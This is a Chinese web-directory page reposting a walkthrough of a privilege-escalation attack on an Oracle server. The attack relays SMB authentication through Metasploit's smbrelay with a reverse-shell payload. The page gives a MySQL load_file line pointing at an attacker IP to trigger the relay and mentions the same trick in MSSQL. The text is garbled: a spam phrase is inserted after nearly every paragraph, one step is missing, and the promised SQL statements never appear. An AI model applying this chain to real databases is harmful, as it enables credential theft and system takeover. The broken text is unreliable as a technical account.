Welcome to the website navigation,本站只接受合法正规的企业网站,欢迎站长们提交你的网站获得展示和流量有任何问题请联系站长,欢迎大家加入本站。

                
提交网站
  • 网站:76083
  • 待审:5
  • APP:577
  • 文章:304411
  • 会员:56004
文字内链包年1000元 文字内链包年1000元 文字内链包年1000元 AI办公网站 AI绘画工具 AIchat

名站网址导航为大家提供关于数据库教程相关的教程网站知识。

Oracle SID存在解決具体相关方法nVIAIChat_企业网址导航_网址分类目录_企业黄页网址提交查询专业网站!

nVIAIChat_企业网址导航_网址分类目录_企业黄页网址提交查询专业网站!

这几天看了篇叫"Penetration: from application down to OS (Oracle)"的文档,感觉挺有意思的,文档的 大概意思就是说,假如如果 ORACLE 服务是用 administrator 账户启动的,您只要有一个具有 resource 和 connect 权限的网站数据库账户,就能利用 metasploit 的 smbrelay 功能,本地搭建一个 SMB 欺骗站点服务器, 来得到系统的访问权限。我本地测试了下,还真的成功了。:-)nVIAIChat_企业网址导航_网址分类目录_企业黄页网址提交查询专业网站!

具体的原理分析看原文吧,我这里把我的测试过程写出来.nVIAIChat_企业网址导航_网址分类目录_企业黄页网址提交查询专业网站!

我的渗透环境用的是 ubuntu8.10 metasploit 3.3 dev,oracle 网站数据库版本为 10.2.0.1.0,服务启动权限为 administrator,网站数据库账户用的是 dbsnmp 账户的默认权限.nVIAIChat_企业网址导航_网址分类目录_企业黄页网址提交查询专业网站!

1.先用 netstat 开始执行命令查看一下,本地的 139 端口有没有占用,一般占用此端口的服务就是 Samba 了,要关掉。ubuntu 的关闭具体相关方法是 sudo /etc/init.d/samba stop<p>nVIAIChat_企业网址导航_网址分类目录_企业黄页网址提交查询专业网站!

nVIAIChat_企业网址导航_网址分类目录_企业黄页网址提交查询专业网站!

nVIAIChat_企业网址导航_网址分类目录_企业黄页网址提交查询专业网站!

2.运行 metasploit,我选用的 PAYLOAD 是 shell_reverse_tcp,做好相应配置后,exploit.就能用 netstat 看到本地已经监听了 139 和 8522 端口了.nVIAIChat_企业网址导航_网址分类目录_企业黄页网址提交查询专业网站!

nVIAIChat_企业网址导航_网址分类目录_企业黄页网址提交查询专业网站!

nVIAIChat_企业网址导航_网址分类目录_企业黄页网址提交查询专业网站!

nVIAIChat_企业网址导航_网址分类目录_企业黄页网址提交查询专业网站!

4.然后执行下面 3 条 SQL 数据库语句nVIAIChat_企业网址导航_网址分类目录_企业黄页网址提交查询专业网站!

nVIAIChat_企业网址导航_网址分类目录_企业黄页网址提交查询专业网站!

nVIAIChat_企业网址导航_网址分类目录_企业黄页网址提交查询专业网站!

nVIAIChat_企业网址导航_网址分类目录_企业黄页网址提交查询专业网站!

nVIAIChat_企业网址导航_网址分类目录_企业黄页网址提交查询专业网站!

mysql,假如如果服务也是 administrator 启动的,用select load_file('\\\\192.168.1.52\mk.txt')也是可以得到系统权限的.MSSQL 应该用 xp_dirtree 存储过程 也是可以的,不过我没有配置出来用 administrator 账户启动 MSSQL 服务,希望知道的朋友指点下我。nVIAIChat_企业网址导航_网址分类目录_企业黄页网址提交查询专业网站!

这个技术可以用到内网 WEB 评估的时候,假如如果有注入,服务又是 administrator 启动的,可以提权了。nVIAIChat_企业网址导航_网址分类目录_企业黄页网址提交查询专业网站!

两个PDF下载,nVIAIChat_企业网址导航_网址分类目录_企业黄页网址提交查询专业网站!

作者:Mickey
(Oracle database).pdf
nVIAIChat_企业网址导航_网址分类目录_企业黄页网址提交查询专业网站!

当执行完 create index 这句的时候,在看咱们本地的 metasploit,就已经得到 ORACLE 网站数据库主机的系 统当前服务用户的 half lm 哈希和 cmdshell 了。nVIAIChat_企业网址导航_网址分类目录_企业黄页网址提交查询专业网站!

关于数据库教程相关的教程网站知识今天我们就说到这里了,希望可以帮到大家。

标签:

分享到:

  网友投稿

注册时间:

网站:0 个   APP:0 个  文章:0 篇

  • 76083

    网站

  • 577

    APP

  • 304411

    文章

  • 56004

    会员

赶快注册账号,推广您的网站吧!
文章分类
热门网站
最新入驻APP小程序

宝贝市场2023-02-08

宝贝市场——买手和卖家商品展示

夺宝助手2023-02-08

夺宝助手小程序,查看每日快夺宝平

查诚信2023-02-08

查诚信是一款免费的商业查询工具

车价天天报2023-02-08

快速连接汽车销售,获知汽车最新报

考勤助理小程序2023-02-08

上班签到考勤,实时定位,后台轻松

汽车报价大全查询2023-02-08

汽车报价大全查询提供最新汽车市